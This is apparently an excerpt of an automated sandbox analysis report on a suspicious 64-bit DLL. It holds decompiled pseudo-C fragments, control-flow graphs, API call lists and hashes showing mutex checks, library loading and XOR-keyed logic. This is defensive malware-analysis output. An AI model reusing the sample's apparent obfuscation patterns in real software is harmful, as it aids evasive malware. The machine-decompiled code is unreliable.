                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocDestroy$Create
                  • String ID: .bss
                  • API String ID: 388876957-3890483948
                  • Opcode ID: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction ID: 17f0f38e5d9243197e023c83d38f09e6848a0c07c4c3a118f17cd0d0cedb6ef9
                  • Opcode Fuzzy Hash: 5b869ae12754507e5804a63dee81d5c07f3243b930885b44b1c254585407c773
                  • Instruction Fuzzy Hash: 68418B72300B4986FB96CB56A8543AA73A0FB4CFD4F04C025EE494BB81DF38DA998710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 44%
                  			E00000001180008708(void* __eax, void* __edi, long long __rbx, intOrPtr* __rcx, void* __rdx, void* _a8, char _a16, long long _a24) {
                  				void* _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t45;
                  				long long _t46;
                  				long long _t47;
                  				struct _SECURITY_ATTRIBUTES* _t57;
                  				long long _t60;
                  				int _t62;
                  				WCHAR* _t66;
                  				void* _t69;
                  				void* _t76;
                  				void* _t79;
                  
                  				_t47 = __rbx;
                  				_t45 = _t69;
                  				 *((long long*)(_t45 + 8)) = __rbx;
                  				r9d = 0;
                  				 *((intOrPtr*)(_t45 - 0x48)) = 0x18;
                  				 *((intOrPtr*)(_t45 - 0x38)) = 0;
                  				0x800085dc(); // executed
                  				if (__eax == 0) goto 0x800087f7;
                  				_a16 =  *__rcx;
                  				_t46 =  &_a24;
                  				r9d = 0;
                  				_v88 = _t46;
                  				E000000011800030C8(__edi, __rbx,  &_a16,  *0x8000d490, __rcx,  *0x8000d490 + 0x180011188, _t79, _t76);
                  				if (_t46 == _t47) goto 0x800087f7;
                  				E0000000118000459C(0x3ff22481, _t46,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t46 == _t47) goto 0x800087c0;
                  				CreateMutexW(_t57, _t62, _t66); // executed
                  				goto 0x800087c3;
                  				_t60 = _t47;
                  				if (_t60 == _t47) goto 0x800087e9;
                  				if (GetLastError() != 0xb7) goto 0x800087e0;
                  				FindCloseChangeNotification(??); // executed
                  				goto 0x800087e9;
                  				_a24 = _t60;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}

















                  0x180008708
                  0x180008708
                  0x18000870b
                  0x180008747
                  0x18000874a
                  0x180008751
                  0x180008754
                  0x18000875b
                  0x18000876f
                  0x180008776
                  0x180008786
                  0x180008789
                  0x18000878e
                  0x180008799
                  0x1800087a4
                  0x1800087ac
                  0x1800087b9
                  0x1800087be
                  0x1800087c0
                  0x1800087c6
                  0x1800087d3
                  0x1800087d8
                  0x1800087de
                  0x1800087e0
                  0x1800087f1
                  0x18000880c

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorHeapLastmemcpy$AllocChangeCloseCreateFindFreeMutexNotificationlstrlen
                  • String ID:
                  • API String ID: 4170216436-0
                  • Opcode ID: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction ID: 127f5c0fcc647b7374bd47b38eb5124d32550bc361860966e3f5016e667268f0
                  • Opcode Fuzzy Hash: 91fca6edbb480d4a463791ea284bd5c18021fdd31d2df17c4dd4c6e232cc3c69
                  • Instruction Fuzzy Hash: B621593220468996EBA1CF52E8407D977A1FB8CBC8F588426EF4D47B49DE34D64EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 180007b94-180007be5 150 180007da3 149->150 151 180007beb-180007bf3 149->151 153 180007da8-180007db8 150->153 151->150 152 180007bf9-180007c24 RtlAllocateHeap 151->152 154 180007c2a-180007c63 memset 152->154 155 180007d9c-180007da1 152->155 156 180007c69-180007c93 154->156 157 180007d6d-180007d85 154->157 155->153 159 180007c98-180007c9b 156->159 160 180007d87-180007d8a 157->160 161 180007d8c-180007d9a HeapFree 157->161 159->157 162 180007ca1-180007caa 159->162 160->153 161->153 163 180007cd6-180007ce7 162->163 164 180007cac-180007cd1 call 180008c48 162->164 166 180007ce9-180007ced 163->166 167 180007d1d-180007d68 163->167 164->163 168 180007cfa-180007d02 166->168 169 180007cef-180007cf8 166->169 167->159 171 180007d07-180007d0e 168->171 169->171 171->166 172 180007d10-180007d18 171->172 172->167
                  APIs
                  • RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                  • memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocateHeapmemset
                  • String ID:
                  • API String ID: 669713250-0
                  • Opcode ID: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction ID: b8eae849a3001c6edc556b20ee36b044cea257758f74ce9d79c82757b9587b00
                  • Opcode Fuzzy Hash: 231eb40ae42393b3803f541fbe69a0b1f40d2ddbec7427b92020bbe0007c72ff
                  • Instruction Fuzzy Hash: 7F518C72B04B8486E7A6CB05E444B9AB7B1FB98BD4F508116EE8D43B54DF38C9A5CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 173 180002464-180002482 LoadLibraryA 174 180002484-180002495 call 180007b94 173->174 175 1800024af-1800024b5 GetLastError 173->175 179 1800024a4-1800024ad FreeLibrary 174->179 180 180002497-1800024a2 174->180 177 1800024b7-1800024c8 175->177 179->177 180->177
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 181 180006dcc-180006e1f call 1800089e4 184 180006e21-180006e36 lstrlenW 181->184 185 180006e8a 181->185 186 180006e38-180006e4d lstrcmpiW 184->186 187 180006e4f-180006e77 call 180002594 184->187 188 180006e8f-180006eaf 185->188 186->187 189 180006e7a-180006e88 HeapFree 186->189 187->189 189->188
                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 23122643edc-2312264405d 194 2312264405f-23122644069 192->194 195 2312264402a-231226440ae 192->195 196 23122644004-2312264400f 194->196 198 231226440a0-231226440a8 195->198 199 231226440b0-231226440b8 195->199 200 23122643f96-23122643fae call 23122644d69 196->200 208 23122644045-23122644253 198->208 202 23122644020-2312264409b call 23122644faa 199->202 209 23122643f27-23122643f29 200->209 214 23122644255-23122644257 208->214 215 23122644240-2312264424b 208->215 212 23122643f1a-23122643f22 209->212 213 23122643f2b-23122643f31 209->213 212->209 217 23122643fce-23122643fdb 212->217 213->212 216 23122643f33 213->216 218 2312264423b-2312264423f 214->218 219 23122643f7a-23122643f85 216->219 220 23122643f87-23122643f94 217->220 221 23122643fdd-23122643fea 217->221 219->220 219->221 220->200 222 23122643f5d-23122643f69 call 23122644929 220->222 223 23122643fc0-23122643fc9 221->223 224 23122643fec-23122644002 221->224 228 23122643fb3-23122643fbe 222->228 229 23122643f6b-23122643f75 call 23122644929 222->229 223->212 224->196 224->208 228->229 229->219 232 23122644114-23122644121 229->232 233 231226440f3-23122644100 call 23122645141 232->233 234 23122644123-2312264412f 232->234 233->234 238 23122644102-2312264410f call 23122644e98 233->238 235 231226440e6-231226440f1 234->235 236 23122644131-23122644139 234->236 235->233 240 231226440db-231226440e4 235->240 236->238 239 2312264413b-23122644146 236->239 238->232 240->235 242 231226440bd-231226440cc RtlAllocateHeap 240->242 242->239 244 231226440ce-231226440d6 242->244 246 231226441d8-231226441df 244->246 247 231226441e1-231226441ea 246->247 248 231226441ec-231226441f8 246->248 247->248 249 23122644204-23122644213 call 23122644e98 247->249 250 23122644215-23122644220 248->250 251 231226441fa-23122644202 248->251 249->250 252 23122644222-2312264422b call 23122645141 249->252 250->251 250->252 251->249 253 231226441cb-231226441cf 251->253 252->218 253->246
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587337801.0000023122640000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023122640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_23122640000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: 73739908600f1f0178662eefecde4c3902be844976e8544ab5f9a3137ec28cdb
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: 3B8176321386A48FE6FCDB18C44D76F76E3FB94700F984518ACCAC7691C6299E66C702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587337801.0000023122640000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023122640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_23122640000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: aa2594a51b240db865fccb91f20ac9e264ec276bd79f92097dcb68379c6248a6
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: 1951F131578664DFE6F8DB18D05D76F76D2FB84340FA80419ACC6CB290D7388AA6DB42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 23122641c0b 315 23122641c14-23122641c19 call 23122645141 314->315 316 23122641d2e-23122641d3b 314->316 327 23122641d78-23122641d83 315->327 317 23122641d12-23122641d1d 316->317 318 23122641d3d-23122641d4a 316->318 323 23122641d02-23122641d10 call 23122644929 317->323 324 23122641d1f-23122641d2c call 23122644929 317->324 320 23122641d69-23122641d72 318->320 321 23122641d4c-23122641d58 318->321 320->327 328 23122641cf3-23122641d00 call 23122644e98 320->328 321->324 326 23122641d5a-23122641d64 321->326 323->317 323->321 324->316 324->318 333 23122641c7c-23122641c86 326->333 331 23122641d85-23122641d91 327->331 332 23122641d93-23122641d9b 327->332 328->323 342 23122641ce8-23122641cf1 call 23122645141 328->342 331->332 336 23122641d9d-23122641da6 331->336 332->331 332->336 338 23122641c88-23122641db4 call 23122641db9 333->338 339 23122641c29-23122641cc6 333->339 341 23122641cda-23122641cdb 336->341 352 23122641cc8 339->352 353 23122641ccd-23122641cd5 339->353 344 23122641cdf-23122641dab 341->344 342->326 355 23122641c45-23122641c51 call 23122643499 352->355 356 23122641c62-23122641c6b 352->356 353->341 353->355 359 23122641c53-23122641c60 355->359 360 23122641c6f-23122641c7a call 23122645141 355->360 356->344 359->356 361 23122641c97-23122641ca1 359->361 360->333 360->359 364 23122641ca7-23122641cad 361->364 365 23122641c1e-23122641c27 RtlAllocateHeap 361->365 366 23122641cb4-23122641cb9 364->366 367 23122641caf 364->367 365->364 366->338 367->315
                  Memory Dump Source
                  • Source File: 00000000.00000002.587337801.0000023122640000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023122640000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_23122640000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: eb2e609fa6c75a5df98fa9970f381e4ff5ab44796725e333af75a69abac27b9b
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 15512D72538668CBE6FCDB18C45876F76E3FB84300F941599ACC6E32E1D62C8B52D642
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 411 1800090f3-18000910c 409->411 412 180008f65 410->412 413 180008df9-180008e1a lstrlenA HeapAlloc 410->413 414 180008f6a-180008f7f HeapFree 412->414 415 1800090e4-1800090e9 413->415 416 180008e20-180008e38 memcpy 413->416 414->411 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 452 180008ff7-18000902d call 18000958c memcpy 433->452 453 18000905e-180009081 call 180002370 433->453 434->409 434->433 450 180008f05 435->450 451 180008f09-180008f1b LeaveCriticalSection 435->451 436->412 442 180008e95-180008e97 437->442 443 180008e8c-180008e93 437->443 439 180008e9b-180008e9e 438->439 444 180008eb5-180008ec3 439->444 445 180008ea0-180008ea3 439->445 442->438 442->439 443->437 443->442 444->432 449 180008ec5-180008eca 444->449 448 180008ea6-180008ea9 445->448 457 180008eab-180008eae 448->457 458 180008eb0-180008eb3 448->458 449->431 450->451 454 180008f1d-180008f38 HeapFree * 2 451->454 455 180008f3e-180008f4d 451->455 462 180009043-180009058 LeaveCriticalSection HeapFree 452->462 463 18000902f-18000903e memset 452->463 453->411 464 180009083-180009099 call 1800038f8 453->464 454->455 455->414 457->444 457->458 458->448 462->453 463->462 464->411 467 18000909b-1800090a4 464->467 467->411 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->411
                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
